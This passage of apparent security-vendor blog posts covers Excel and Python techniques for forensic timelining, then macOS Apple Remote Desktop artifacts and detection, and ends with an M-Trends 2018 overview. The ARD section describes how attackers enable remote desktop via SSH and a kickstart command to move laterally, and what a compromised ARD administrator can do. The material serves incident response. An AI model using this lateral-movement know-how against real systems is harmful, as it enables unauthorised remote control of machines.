An example command to join the relevant file system data delimited by ampersands could be “=D2 & " | " & C2 & " | " & E2 & " | " & F2 & " | " & G2 & " | " & H2”. Combining this format function with a “Timestamp” and “Timestamp Type” column will complete everything we need for streamlined analysis.
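The same normalization can also be scripted outside of Excel when datasets get large. Below is a small, hypothetical pandas sketch of the identical idea: collapse each artifact’s descriptive columns into one summary field so that different artifact types share the Timestamp / Timestamp Type / Event shape and can be concatenated into a single timeline.

import pandas as pd

# Hypothetical parsed file system rows (one row per timestamp of interest)
fs = pd.DataFrame([{
    "ts": "2019-10-14 23:13:04", "type": "$SI Created",
    "path": "C:\\Users\\attacker\\Documents\\", "name": "Default.rdp",
    "size": 485, "md5": "c482e563df19a401941c99888ac2f525",
    "attrs": "Archive", "deleted": "FALSE",
}])

# Join the descriptive columns into a single summary, mirroring the
# '=D2 & " | " & C2 & ...' Excel formula above
fs["Event"] = fs[["path", "name", "size", "md5", "attrs", "deleted"]] \
    .astype(str).agg(" | ".join, axis=1)

timeline = fs.rename(columns={"ts": "Timestamp", "type": "Timestamp Type"})
timeline = timeline[["Timestamp", "Timestamp Type", "Event"]]

# Event log and Registry records would be normalized the same way, then
# combined with pd.concat([...]).sort_values("Timestamp")
print(timeline.to_string(index=False))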

Timestamp:       2019-10-14 23:13:04
Timestamp Type:  $SI Created
Event:           C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525 | Archive | FALSE

Timestamp:       2019-10-14 23:13:06
Timestamp Type:  Event Gen Time
Event:           4648 | A logon was attempted using explicit credentials.
                 Subject:
                    Security ID:  DomainCorp\Administrator
                    Account Name:  Administrator
                    Account Domain:  DomainCorp
                    Logon ID:  0x1b38fe
                    Logon GUID:  {00000000-0000-0000-0000-000000000000}
                 Account Whose Credentials Were Used:
                    Account Name:  VictimUser
                    Account Domain:  DomainCorp
                    Logon GUID:  {00000000-0000-0000-0000-000000000000}
                 Target Server:
                    Target Server Name: DestinationServer
                    Additional Information:
                 Process Information:
                    Process ID:  0x5ac
                    Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
                 Network Information:
                    Network Address: -
                    Port:   - | Logon | Administrator | SourceSystem

Timestamp:       2019-10-14 23:33:45
Timestamp Type:  $SI Modified
Event:           C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525 | Archive | FALSE

Timestamp:       2019-10-14 23:33:46
Timestamp Type:  KeyModified
Event:           HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\ | DestinationServer | UsernameHInt | VictimUser

After sorting by timestamp, we can see evidence of the “DomainCorp\Administrator” account connecting from “SourceSystem” to “DestinationServer” with the “DomainCorp\VictimUser” account via RDP across three artifact types.

Time Zone Conversions

One of the most critical elements of incident response and forensic analysis is timelining. Temporal analysis will often turn up new evidence by identifying events that precede or follow an event of interest. Equally critical is producing an accurate timeline for reporting. Timestamps and time zones can be frustrating, and things can get confusing when the systems being analyzed span multiple time zones. Mandiant tracks all timestamps in Coordinated Universal Time (UTC) in its investigations to eliminate confusion from both time zones and time adjustments such as daylight saving and regional summer seasons.

Of course, various sources of evidence do not always log time the same way. Some may be local time, some may be UTC, and as mentioned, data from sources in various geographical locations complicates things further. When compiling timelines, it is important to first know whether the evidence source is logged in UTC or local time. If it is logged in local time, we need to confirm which local time zone the evidence source is from. Then we can use the Excel TIME()  formula to convert timestamps to UTC as needed.

This example scenario is based on a real investigation where the target organization was compromised via phishing email, and employee direct deposit information was changed via an internal HR application. In this situation, we have three log sources: email receipt logs, application logins, and application web logs. 

The email logs are recorded in UTC and contain the following information:

The application logins are recorded in Eastern Daylight Time (EDT) and contain the following:

The application web logs are also recorded in Eastern Daylight Time (EDT) and contain the following:

To take this information and turn it into a master timeline, we can use the CONCAT function (an alternative to the ampersand concatenation used previously) to make a summary of the columns in one cell for each log source, such as this example formula for the email receipt logs:

This is where checking our time zones for each data source is critical. If we took the information as it is presented in the logs and assumed the timestamps were all in the same time zone and created a timeline of this information, it would look like this:

As it stands in the previous screenshot, we have some login events to the HR application, which may look like normal activity for the employees. Then later in the day, they receive some suspicious emails. If this were hundreds of lines of log events, we would risk the login and web log events being overlooked as the time of activity precedes our suspected initial compromise vector by a few hours. If this were a timeline used for reporting, it would also be inaccurate.

When we know which time zone our log sources are in, we can adjust the timestamps accordingly to reflect UTC. In this case, we confirmed through testing that the application logins and web logs are recorded in EDT, which is four hours behind UTC, or “UTC-4”. To change these to UTC time, we just need to add four hours to the time. The Excel TIME function makes this easy. We can just add a column to the existing tables, and in the first cell we type “=A2+TIME(4,0,0)”. Breaking this down:

  • =A2
    • Reference cell A2 (in this case our EDT timestamp). Note this is not an absolute reference, so we can use this formula for the rest of the rows.
  • +TIME
    • This tells Excel to take the value of the data in cell A2 as a “time” value type and add the following amount of time to it:
  • (4,0,0)
    • The TIME function in this instance requires three values, which are, from left to right: hours, minutes, seconds. In this example, we are adding 4 hours, 0 minutes, and 0 seconds.

Now we have a formula that takes the EDT timestamp and adds four hours to it to make it UTC. Then we can replicate this formula for the rest of the table. The end result looks like this:

When we have all of our logs in the same time zone, we are ready to compile our master timeline. Taking the UTC timestamps and the summary events we made, our new, accurate timeline looks like this:

Now we can clearly see suspicious emails sent to (fictional) employees Austin and Dave. A few minutes later, Austin’s account logs into the HR application and adds a new bank account. After this, we see the same email sent to Jake. Soon after this, Jake’s account logs into the HR application and adds the same bank account information as Austin’s. Converting all our data sources to the same time zone with Excel allowed us to quickly link these events together and easily identify what the attacker did. Additionally, it provided us with more indicators, such as the known-bad bank account number to search for in the rest of the logs.

Pro Tip: Be sure to account for log data spanning over changes in UTC offset due to regional events such as daylight savings or summer seasons. For example, local time zone adjustments will need to change for logs in United States Eastern Time from Virginia, USA from +TIME(5,0,0) to +TIME(4,0,0) the first weekend in March every year and back from +TIME(4,0,0) to +TIME(5,0,0) the first weekend in November to account for daylight and standard shifts.
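When this conversion is scripted rather than done in Excel, a time-zone library removes the need to track those seasonal offset changes by hand. A minimal sketch using Python’s standard zoneinfo module (available in Python 3.9+):

from datetime import datetime
from zoneinfo import ZoneInfo

EASTERN = ZoneInfo("America/New_York")
UTC = ZoneInfo("UTC")

def eastern_to_utc(ts):
    """Convert a naive 'YYYY-MM-DD HH:MM:SS' US Eastern timestamp to UTC,
    accounting for daylight saving automatically."""
    local = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=EASTERN)
    return local.astimezone(UTC).strftime("%Y-%m-%d %H:%M:%S")

# July is EDT (UTC-4); January is EST (UTC-5), so the offsets differ:
print(eastern_to_utc("2019-07-01 08:00:00"))  # 2019-07-01 12:00:00
print(eastern_to_utc("2019-01-15 08:00:00"))  # 2019-01-15 13:00:00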

CountIf for Log Baselining

When reviewing logs that record authentication in the form of a user account and timestamp, we can use COUNTIF to establish simple baselines to identify those user accounts with inconsistent activity.  

In the example of user logons that follows, we'll use the formula "=COUNTIF($B$2:$B$25,B2)" to establish a historical baseline. Here is a breakdown of the parameters for this COUNTIF formula located in C2 in our example: 

  • COUNTIF 
    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B$25 
    • This is the entire range of all cells, B2 through B25, that we want to use as a range to search for a specific value. Note the use of "$" to ensure that the start and end of the range are an absolute reference and are not automatically updated by Excel if we copy this formula to other cells. 
  • B2 
    • This is the cell that contains the value we want to search for and count occurrences of in our range of $B$2:$B$25. Note that this parameter is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data and count how many times the user of each logon has logged on in total across all data points. 
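For reference, the same total-count baseline is a one-liner outside of Excel; here is a hypothetical pandas equivalent over the same kind of logon data:

import pandas as pd

# Hypothetical logon records: timestamp + username columns, like B2:B25 above
logons = pd.DataFrame({
    "timestamp": ["2019-10-01 08:02", "2019-10-01 08:05", "2019-10-01 22:41"],
    "username":  ["austin",           "dave",             "attacker"],
})

# Equivalent of =COUNTIF($B$2:$B$25, B2): total logons per account
logons["total_logons"] = logons.groupby("username")["username"].transform("count")
print(logons)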

When most user accounts log on regularly, a compromised account being used to logon for the first time may clearly stand out when reviewing total log on counts. If we have a specific time frame in mind, it may be helpful to know which accounts first logged on during that time.  

The COUNTIF formula can help track accounts through time to identify their first log on which can help identify rarely used credentials that were abused for a limited time frame.  

We'll start with the formula "=COUNTIF($B$2:$B2,B2)" in cell D3. Here is a breakdown of the parameters for this COUNTIF formula. Note that the use of "$" for absolute referencing is slightly different for the range used, and that is an important nuance: 

  • COUNTIF 
    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B2 
    • This is the range of cells, B2 through B2, that we want to start with. Since we want to increase our range as we go through the rows of the log data, the ending cell row number (2 in this example) is not made absolute. As we fill this formula down through the rest of our log data, it will automatically expand the range to include the current log record and all previous logs. 
  • B2 
    • This cell contains the value we want to search for and provides a count of occurrences found in our defined range. Note that this parameter B2 is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data before and including the current log and count how many times the user of each logon has logged on up to that point in time. 
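The expanding-range version has an equally direct scripted equivalent: a cumulative count per account, where a value of 1 marks that account's first observed logon. A hypothetical sketch continuing the pandas example above:

# Equivalent of =COUNTIF($B$2:$B2, B2): logons per account up to and
# including the current row (sort by timestamp first so "first" is temporal)
logons = logons.sort_values("timestamp")
logons["running_count"] = logons.groupby("username").cumcount() + 1

# A running_count of 1 is that account's first appearance in the logs
first_seen = logons[logons["running_count"] == 1]
print(first_seen)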

The following example illustrates how Excel automatically updated the range for D15 to $B$2:$B15 using the fill handle.  


To help visualize a large data set, let's add color scale conditional formatting to each row individually. To do so: 

  1. Select only the cells we want to compare with the color scale (such as D2 to D25). 
  2. On the Home menu, click the Conditional Formatting button in the Styles area. 
  3. Click Color Scales. 
  4. Click the type of color scale we would like to use. 

The following examples set the lowest values to red and the highest values to green. We can see how: 

  • Users with lower authentication counts contrast against users with more authentications. 
  • The first authentication times of users stand out in red. 

Whichever colors are used, be careful not to assume that one color, such as green, implies safety and another color, such as red, implies maliciousness.

Conclusion

The techniques described in this post are just a few ways to utilize Excel to perform analysis on arbitrary data. While these techniques may not leverage some of the more powerful features of Excel, as with any variety of skill set, mastering the fundamentals enables us to perform at a higher level. Employing fundamental Excel analysis techniques can empower an investigator to work through analysis of any presented data type as efficiently as possible.

Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil

Attackers often make their lives easier by relying on pre-existing operating system and third party applications in an enterprise environment. Leveraging these applications assists them with blending in with normal network activity and removes the need to develop or bring their own malware. This tactic is often referred to as Living Off The Land. But what about when that land is an Apple orchard?

In recent enterprise macOS investigations, FireEye Mandiant identified the Apple Remote Desktop application as a lateral movement vector and as a source for valuable forensic artifacts.

Apple Remote Desktop (ARD) was first released in 2002 and is Apple’s “desktop management system for software distribution, asset management, and remote assistance”. An ARD deployment consists of administrator and client machines. While the administrator app must be downloaded from the macOS App Store, the client application is included natively as part of macOS. Client systems must be added to the client list on an administrator system manually, or they can be discovered via Bonjour if they are in the same local subnet as the administrator system. In a typical enterprise environment deployment, managers would be the ARD administrators and have the ability to view, manage, and remotely control their managed personnel’s workstations via ARD.

Lateral Movement

Mandiant has observed attackers using the ARD screen sharing function to move laterally between systems. If remote desktop was not enabled on a target system, Mandiant observed attackers connecting to systems via SSH and executing a kickstart command to enable remote desktop management. This allowed remote desktop access to the target systems. The following is an example from the macOS Unified Log showing a kickstart command used by an attacker to enable remote desktop access for all users with all privileges:


Figure 1: Kickstart command example

During an investigation, you can use a few different artifacts to trace this activity. Execution of the kickstart command modifies the contents of the configuration file /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd to contain the string “enabled”. SSH login activity can be found in the Apple System Logs or Audit Logs. Execution of the kickstart command can be found in the Unified Logs, as seen in Figure 1.
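As a practical example of checking the first artifact, the sketch below (an illustration of ours, not a Mandiant tool) tests whether the RemoteManagement.launchd configuration file contains the “enabled” string left behind by the kickstart command; the root parameter lets it run against a live system or a mounted forensic image.

import os

CONFIG = ("Library/Application Support/Apple/Remote Desktop/"
          "RemoteManagement.launchd")

def remote_management_enabled(root="/"):
    """Return True if the ARD config file indicates remote management
    was enabled (e.g., via a kickstart command)."""
    path = os.path.join(root, CONFIG)
    if not os.path.exists(path):
        return False
    with open(path, "rb") as f:
        return b"enabled" in f.read()

# root="/" for a live system, or the mount point of a forensic image
print(remote_management_enabled())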

An ARD administrator has a substantial amount of power available to them, similar to compromising an administrator account in a Windows environment. By compromising an account that has access to an ARD administrator system, an attacker can perform any of the following actions:

  • Remotely control VNC-enabled machines, including in “Curtain Mode” which hides the remote actions from the local workstation’s screen
  • Transfer files
  • Remotely shut down or restart multiple machines simultaneously
  • Schedule tasks
  • Execute AppleScript and UNIX shell scripts

Apple’s ARD web page and the ARD help page contain more details about ARD’s capabilities.

ARD Reporting as a Forensic Force Multiplier

Along with remote system control functionality, Apple Remote Desktop’s asset management capabilities include conducting remote Spotlight searches, file searching, generating software version information reports, and more importantly, generating application usage and user history reports. The reporting process generally follows these steps:

  1. Client systems compute reports and cache the data locally before transferring them to the administrator system (the default policy is to begin this at 12:00 AM local time, daily).
  2. Data received from clients is cached on the administrator system. Alternatively, a macOS system with the administrator version of ARD installed can be set up as a “Task Server” for a centralized collection option.
  3. Cached data is written to a SQLite database on the administrator system.

The cached data is stored in various subdirectories under the /private/var/db/RemoteManagement/ parent directory. The directory has the following structure:


Figure 2: /private/var/db/RemoteManagement/ directory structure

This directory structure is present on all systems, but which files exist in which directories depends on whether the system is an ARD client or administrator system.

Artifacts from ARD Client Systems

There is one directory that is the focus for investigations on client systems: /private/var/db/RemoteManagement/caches/. This directory contains the files listed in Table 1, which make up the local client data cache that is periodically reported to the administrator system. Note, however, that these files are routinely deleted from the client system once they are transmitted to the administrator system, so they may not be present; once transmitted, the data is stored on the administrator system.

File              Description
AppUsage.plist    plist file containing application usage data
AppUsage.tmp      Binary plist file containing application usage data, often the same as or less thorough than AppUsage.plist
asp.cache         Binary plist of system information
filesystem.cache  Database containing an index of the entire file system, including users and groups
sysinfo.cache     Binary plist containing system information, some of which is also present in asp.cache
UserAcct.tmp      Binary plist containing user login activity

Table 1: ARD cache files

In our experience, the most useful information available from these files is application usage and user activity.

Application Usage

The RemoteManagement/caches/AppUsage.plist file contains one key per application, where each key is the full path of the application, such as file:///Applications/Calculator.app/.

Each application key contains a dictionary that includes a “runData” array and a “Name” string, which is the friendly name of the application, such as “Calculator”, as seen in Figure 3.


Figure 3: AppUsage.plist structure

Each “runData” array contains at least one dictionary consisting of the following keys and values:

Key        Value Format              Description
wasQuit    Boolean: true or false    Indicator of whether or not the application was quit prior to the last report time. This field may not exist if the value is not “true”.
Frontmost  Number of seconds         Total duration which the application was “frontmost” on the screen
Launched   macOS absolute timestamp  Time the application was launched
runLength  Number of seconds         Duration the application was run
username   String                    User who launched the application

Table 2: AppUsage.plist runData keys and values

Of the two application usage cache artifacts, RemoteManagement/caches/AppUsage.plist usually contains at least as much content as RemoteManagement/caches/AppUsage.tmp.
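
Because these plists are simple key/value structures, a few lines of Python are enough to triage them. The following is a minimal sketch, assuming the layout described above and that "Launched" is either a plist date or a macOS absolute timestamp (seconds since 2001-01-01 00:00:00 UTC); the file path is illustrative:

```python
#!/usr/bin/env python3
"""Sketch: triage application usage from an ARD AppUsage.plist."""
import plistlib
from datetime import datetime, timedelta, timezone

MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

def to_datetime(value):
    """Normalize a plist <date> or macOS absolute timestamp to UTC."""
    if isinstance(value, datetime):
        return value
    return MAC_EPOCH + timedelta(seconds=float(value))

with open("AppUsage.plist", "rb") as f:  # illustrative path
    apps = plistlib.load(f)

for app_url, info in apps.items():
    for run in info.get("runData", []):
        print(info.get("Name", app_url),
              to_datetime(run["Launched"]).isoformat(),
              run.get("username", "?"),
              f'{float(run.get("runLength", 0)):.0f}s')
```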

User Activity

The RemoteManagement/caches/UserAcct.tmp file is a binary plist that contains user activity that can be correlated with other artifacts on a macOS system, such as the Apple System Logs or Audit Logs. The file is keyed by the short name of each user who has logged on to the system.

Each key contains a dictionary that includes a “uid” string with the user’s UID, and an array for each login type: console, tty, or SSH. Each login-type array contains at least one dictionary consisting of the following keys and values:

Key     | Value Format             | Description
--------|--------------------------|-------------------------------------------
inTime  | macOS absolute timestamp | Time the user logged in
outTime | macOS absolute timestamp | Time the user logged out
host    | String                   | Originating host for a remote login; not consistently present

Table 3: UserAcct.tmp keys and values
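
A similar sketch works for UserAcct.tmp. The login-type key names ("console", "tty", "ssh") below follow the description above but have not been exhaustively verified, so treat them as assumptions:

```python
#!/usr/bin/env python3
"""Sketch: list login sessions from an ARD UserAcct.tmp binary plist."""
import plistlib
from datetime import datetime, timedelta, timezone

MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

def ts(value):
    """Render a plist <date> or macOS absolute timestamp as ISO 8601."""
    if isinstance(value, datetime):
        return value.isoformat()
    return (MAC_EPOCH + timedelta(seconds=float(value))).isoformat()

with open("UserAcct.tmp", "rb") as f:  # illustrative path
    users = plistlib.load(f)

for user, record in users.items():
    for login_type in ("console", "tty", "ssh"):  # assumed key names
        for session in record.get(login_type, []):
            out = session.get("outTime")  # may be absent for live sessions
            print(user, record.get("uid"), login_type,
                  ts(session["inTime"]),
                  ts(out) if out is not None else "-",
                  session.get("host", "-"))
```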

Artifacts From ARD Administrator Systems

The data outlined in Table 1 is reported to the administrator system daily. The files are then stored in the RemoteManagement/ClientCaches/ directory. Each file is renamed to the MAC address of the reporting system and placed into the appropriate subdirectory, as seen in Table 4. The subdirectories contain the following:

Subdirectory      | Data Contained in Each File
------------------|----------------------------
ApplicationUsage/ | AppUsage.plist files
SoftwareInfo/     | filesystem.cache files
SystemInfo/       | sysinfo.cache files
UserAccounting/   | UserAcct.tmp files

Table 4: /private/var/db/RemoteManagement/ClientCaches/ subdirectories

Additionally, there is a plist file, RemoteManagement/ClientCaches/cacheAccess.plist, that contains keys of MAC addresses whose values are additional MAC addresses. The purpose and context of this file have yet to be determined.

The Gold Mine

All the aforementioned data, with the exception of the filesystem.cache files, is added to the main SQLite database, RemoteManagement/RMDB/rmdb.sqlite3 ("RMDB"). The RMDB exists on all ARD systems but is only populated on the administrator system. It houses a wealth of information about the systems in the ARD network over a significant timespan: Mandiant has observed application usage timestamps dating back more than a year before the database was acquired from a live system.
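
Because the RMDB is ordinary SQLite, any standard client can open it. As a quick sanity check before digging into the per-table sections below, a sketch like this (run against a forensic copy; the path is illustrative) confirms the schema:

```python
import sqlite3

# Open read-only so the evidence copy is not modified.
conn = sqlite3.connect("file:rmdb.sqlite3?mode=ro", uri=True)
for (name,) in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"):
    print(name)  # expect the five tables described below
```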

The RMDB file contains five tables: ApplicationName, ApplicationUsage, PropertyNameMap, SystemInformation, and UserUsage. The following sections detail each table within the database:

ApplicationName

This table is an index for the applications on each system, where each application is assigned an item sequence number (“ItemSeq”) per system. This data is used for correlation in the ApplicationUsage table.

Column      | Value Format             | Description
------------|--------------------------|-------------------------------------------
ComputerID  | String                   | Client MAC address, no separators
AppName     | String                   | Friendly application name
AppURL      | String                   | Application URL path (e.g., file:///Applications/Calculator.app)
ItemSeq     | Integer                  | ID number for each application, per ComputerID, referenced by the ApplicationUsage table
LastUpdated | macOS absolute timestamp | Last report time of the client

Table 5: ApplicationName table columns

ApplicationUsage

The ApplicationUsage table is unique in that its "FrontMost" and "LaunchTime" values are swapped: "FrontMost" holds the application launch timestamp, while "LaunchTime" holds the time the application spent frontmost. This research was verified on macOS 10.14 (Mojave) at the time of this blog post.

Column      | Value Format                           | Description
------------|----------------------------------------|-------------------------------------------
ComputerID  | String                                 | Client MAC address, no separators
FrontMost   | macOS absolute timestamp               | Application launch time
LaunchTime  | Number of seconds, to 6 decimal places | Total duration the application was "frontmost" on screen
RunLength   | Number of seconds, to 6 decimal places | Total duration the application was running
ItemSeq     | Integer                                | ItemSeq number for the respective ComputerID, referenced in the ApplicationName table
LastUpdated | macOS absolute timestamp               | Last report time of the client
UserName    | String                                 | User who launched the application
RunState    | Integer                                | "1" for "running" or "0" for "terminated" at the time of the last report

Table 6: ApplicationUsage table columns
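
Since friendly application names live in ApplicationName and usage records in ApplicationUsage, reconstructing a per-host execution timeline means joining the two tables on ComputerID and ItemSeq while accounting for the FrontMost/LaunchTime swap. A minimal sketch, assuming the schema in Tables 5 and 6 (the database path is illustrative):

```python
import sqlite3
from datetime import datetime, timedelta, timezone

MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

conn = sqlite3.connect("file:rmdb.sqlite3?mode=ro", uri=True)
query = """
SELECT u.ComputerID,
       n.AppName,
       u.UserName,
       u.FrontMost  AS launch_ts,       -- swapped: holds the launch timestamp
       u.LaunchTime AS frontmost_secs,  -- swapped: holds the frontmost duration
       u.RunLength
FROM ApplicationUsage u
JOIN ApplicationName n
  ON n.ComputerID = u.ComputerID AND n.ItemSeq = u.ItemSeq
ORDER BY u.FrontMost
"""
for computer, app, user, launch_ts, frontmost, run_len in conn.execute(query):
    launched = MAC_EPOCH + timedelta(seconds=launch_ts)
    print(computer, app, user, launched.isoformat(),
          f"frontmost={frontmost:.0f}s run={run_len:.0f}s")
```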

PropertyNameMap

This table is used as a reference for the SystemInformation table.

Column        | Value Format | Description
--------------|--------------|-------------------------------------------
ObjectName    | String       | Elements of a macOS system, such as Mac_HardDriveElement, Mac_USBDeviceElement, and Mac_SystemInfoElement
PropertyName  | String       | Property names for each element, such as ProductName, ProductID, VendorID, and VendorName for Mac_USBDeviceElement
PropertyMapID | Integer      | ID number for each property, per element

Table 7: PropertyNameMap table columns

SystemInformation

This table collects a substantial amount of system information. It can be leveraged to extract USB device information, IP addresses, hostnames, and more for all reported client systems.

Column       | Value Format             | Description
-------------|--------------------------|-------------------------------------------
ComputerID   | String                   | Client MAC address, with colon separators
ObjectName   | String                   | Elements of a macOS system, outlined in the PropertyNameMap table
PropertyName | String                   | Properties per element, outlined in the PropertyNameMap table
ItemSeq      | Integer                  | ID number for each element instance; e.g., four Mac_USBDeviceElement data sets receive ItemSeq numbers 0-3 to group their properties together
Value        | String                   | Data for the respective property
LastUpdated  | yyyy-mm-ddThh:mm:ssZ     | Last report time of the client, in 24-hour local time (e.g., 2019-08-07T02:11:34Z)

Table 8: SystemInformation table columns
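
Because each element instance is split across multiple rows, pivoting on ComputerID and ItemSeq reassembles the properties of, for example, each USB device. The ObjectName and PropertyName values below are taken from Table 7; everything else in this sketch is an assumption:

```python
import sqlite3

conn = sqlite3.connect("file:rmdb.sqlite3?mode=ro", uri=True)
query = """
SELECT ComputerID, ItemSeq, PropertyName, Value
FROM SystemInformation
WHERE ObjectName = 'Mac_USBDeviceElement'
ORDER BY ComputerID, ItemSeq
"""
devices = {}  # (ComputerID, ItemSeq) -> {PropertyName: Value}
for computer, seq, prop, value in conn.execute(query):
    devices.setdefault((computer, seq), {})[prop] = value

for (computer, seq), props in sorted(devices.items()):
    print(computer, seq,
          props.get("VendorName", "?"), props.get("ProductName", "?"))
```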

UserUsage

This table contains the user login activity for all the reported client systems.

Column      | Description of Value
------------|-------------------------------------------
ComputerID  | Client MAC address, no separators
LastUpdated | macOS absolute timestamp; last report time of the client
UserName    | Short name of the user
LoginType   | Console, tty, or ssh
inTime      | macOS absolute timestamp; time the user logged in
outTime     | macOS absolute timestamp; time the user logged out
Host        | Originating host for a remote login; not consistently present

Table 9: UserUsage table columns
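
SQLite can convert the macOS absolute timestamps inline by adding the 978,307,200-second offset between the Unix epoch (1970-01-01) and the macOS epoch (2001-01-01). A minimal sketch of pulling a login timeline, assuming the columns in Table 9:

```python
import sqlite3

conn = sqlite3.connect("file:rmdb.sqlite3?mode=ro", uri=True)
query = """
SELECT ComputerID, UserName, LoginType,
       datetime(inTime  + 978307200, 'unixepoch') AS login,
       datetime(outTime + 978307200, 'unixepoch') AS logout,
       Host
FROM UserUsage
ORDER BY inTime
"""
for row in conn.execute(query):
    print(*row)  # logout and Host may be NULL for live or local sessions
```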

Filesystem Cache

The RemoteManagement/ClientCaches/filesystem.cache file is a database that indexes the files and directories found on a macOS computer's file system. Rather than using SQLite like the RMDB, ARD uses a custom database implementation to track this information. Fortunately, the database file format is fairly simple, consisting of a file header, six tables, and entries that point to string values. By interpreting the information in the filesystem cache file, an investigator can recreate the directory structure of an ARD-enabled system. Mandiant uses this technique to identify and demonstrate the existence of attacker-created files.

The database header, identified by the magic value “hdix”, contains metadata about the database, such as the total number of indexed folders, files, and symlinks. Pointers from this header lead to the six tables: “main”, “names” (file names), “kinds” (file extensions), “versions” (macOS app bundle version infos), “users”, and “groups”. Entries in the “main” table contain references to entries in the other tables; by walking these references, an investigator can recover full file system paths and metadata.
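
Only the "hdix" magic is documented above; the assumption in the sketch below is that it sits at the very start of the file. Full parsing of the six tables is better left to a dedicated tool (see ARDvark later in this post), but a quick check avoids misidentifying the file:

```python
# Sanity-check a suspected filesystem.cache file before deeper parsing.
with open("filesystem.cache", "rb") as f:  # illustrative path
    magic = f.read(4)

if magic == b"hdix":
    print("looks like an ARD file system cache")
else:
    print(f"unexpected magic: {magic!r}")
```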

In practice, the filesystem.cache file may be tens of megabytes in size, tracking dozens or hundreds of thousands of file system entries. Figure 4 shows truncated content of a parsed file system cache file; these entries are for the artifacts discussed in this article!


Figure 4: Screenshot of filesystem.cache contents, listing ARD artifacts

On a macOS system, the program “build_hd_index” traverses the file system and indexes the files and directories into filesystem.cache. Figure 5 shows a portion of the documentation for this tool; as expected, the default output directory is [/private]/var/db/RemoteManagement/caches/.


Figure 5: Documentation for build_hd_index

Ironically, internet message board posts going back to at least 2007 complain about the performance impact of this tool. A post by "Anonymous" indicates that "build_hd_index" was designed to support file indexing on OS X Panther (2003), which didn't have Spotlight. Now, 16 years later, we can exploit these artifacts during an incident response.

Introducing: ARDvark

If these artifacts surface in a future investigation, leveraging their wealth of data will be critical to identifying attacker activity. In some scenarios investigators may be able to generate reports directly from an ARD administrator system, but that is not always possible; otherwise, investigators must manually acquire the RMDB file from the ARD administrator system and extract the information themselves. ARDvark is a tool that extracts all user activity and application usage recorded in the RMDB and outputs the data in an analyst-friendly format.

ARDvark will also process the AppUsage.plist and UserAcct.tmp files found on ARD client systems under /private/var/db/RemoteManagement/caches/. Additionally, ARDvark can parse filesystem.cache files to produce a file system listing, as well as a listing of all users and groups present on the respective system. Please see the FireEye GitHub for more information.

Detecting and Preventing ARD Abuse

To detect suspicious ARD usage, organizations can monitor for anomalous modification of the /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd file, which indicates that remote desktop access has been enabled on a system where ARD is not expected. Analyzing the Unified Logs for evidence of unexpected kickstart commands during threat hunting missions can uncover suspicious ARD usage as well.
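
One hedged way to hunt for the latter is to query the Unified Logs for kickstart activity with the built-in log utility; the predicate below is a starting-point assumption to tune for your environment, and local log retention limits how far back it can see:

```python
import subprocess

# Search the last 7 days of Unified Logs for mentions of kickstart.
cmd = [
    "log", "show",
    "--last", "7d",
    "--info",
    "--predicate", 'eventMessage CONTAINS[c] "kickstart"',
]
result = subprocess.run(cmd, capture_output=True, text=True, check=False)
print(result.stdout or result.stderr)
```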

Mitigating ARD abuse relies on the principle of least privilege. Mandiant recommends granting as few remote control privileges as possible and limiting administrator privileges to only the accounts that require them. Apple provides guidance on setting privileges, and on authenticating without using local accounts, in the ARD help page and the ARD user guide. ARD administrators can then routinely generate reports in the ARD application to verify that no changes have been made to administration privilege settings.

A Bushel of Evidence

Application usage artifacts for macOS are few and far between. To date, some of the best sources include the CoreAnalytics files and the Spotlight database, but none of these artifacts provide the exact execution time of every application. While ARD artifacts are not present on every macOS system, if ARD is deployed in an enterprise environment it may provide some of the most valuable application usage data available to investigators, data you would not otherwise uncover.

User login activity typically exists in the Apple System Logs and Audit Logs, but short log retention is frequently an issue when the average attacker dwell time in 2018 was 78 days. The RMDB provides a potential source of application usage and user login information that is over a year old, long outliving typical log retention times.

The system information available in the RMDB includes IP addresses, USB device information, and more that may be useful to investigators. The collected file system cache files also contain an extensive file listing for multiple macOS systems, allowing investigators to identify files or users of interest on other systems without having to collect data from each suspect system directly.

ARD is an excellent example of how remote administration tools provide an attack surface for abuse while simultaneously providing a vast amount of data that helps piece together malicious activity, all from a single system. If your organization utilizes ARD, consider reviewing the information available through its reporting functionality during threat hunting and future investigations, as the artifact doesn't fall far from the tree.

M-Trends 2018

What have incident responders observed and learned from cyber attacks in 2017? Just as in prior years, we have continued to see the cyber security threat landscape evolve. Over the past twelve months we have observed a number of new trends and changes to attacks, but we have also seen how certain trends and predictions from the past have been confirmed or even reconfirmed.

Our 9th edition of M-Trends draws upon the findings of one year of incident response investigations across the globe. This data provides us with insights into the evolution of nation-state sponsored threat actors, new threat groups, and new trends and attacker techniques we have observed during our investigations. We also compare this data to past observations from prior M-Trends reports and continue our tradition of reporting on key metrics and their development over time.

Some of the topics we cover in the 2018 M-Trends report include:

  • How the global median time from compromise to internal discovery has dropped from 80 days in 2016 to 57.5 days in 2017.
  • The increase of attacks originating from threat actors sponsored by Iran.
  • Metrics about attacks that have retargeted or even recompromised prior victim organizations, a topic we previously discussed in our 2013 edition of M-Trends.
  • The widening cyber security skills gap and the rising demand for skilled personnel capable of meeting the challenges posed by today’s more sophisticated threat actors.
  • Frequently observed areas of weaknesses in security programs and their relation to security incidents.
  • Observations and lessons we have learned from our red teaming exercises about the effectiveness and gaps of common security controls.

By sharing this report with the security community, we continue our tradition of providing security professionals with insights and knowledge gained from recent breaches. We hope that you find this report useful in your work to strengthen your security posture and defend against the ever-evolving threats.